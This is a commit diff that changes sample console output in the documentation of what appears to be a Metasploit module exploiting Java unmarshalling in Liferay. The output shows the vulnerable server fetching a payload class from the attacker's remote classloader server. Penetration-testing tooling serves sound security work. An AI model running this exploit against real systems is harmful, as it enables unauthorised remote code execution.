Be more verbose and validate classloader server
This commit is contained in:
William Vu
@@ -65,7 +65,8 @@ msf5 exploit(multi/http/liferay_java_unmarshalling) > run
|
||||
[+] The target appears to be vulnerable. Liferay 7.2.0 CE GA1 MAY be a vulnerable version. Please verify.
|
||||
[*] Using URL: http://0.0.0.0:8888/
|
||||
[*] Local IP: http://192.168.1.3:8888/
|
||||
[*] Sending go-go-gadget for remote classloading
|
||||
[+] Started remote classloader server at http://192.168.1.3:8888/
|
||||
[*] Unmarshalling remote classloader at http://127.0.0.1:8080/api/jsonws/expandocolumn/update-column
|
||||
[*] GET /Uphxohekruuokpedknflsriuafhrdsfk.class requested
|
||||
[+] Sending constructor class
|
||||
[*] GET /metasploit/Payload.class requested
|
||||
|
||||
Reference in New Issue
Block a user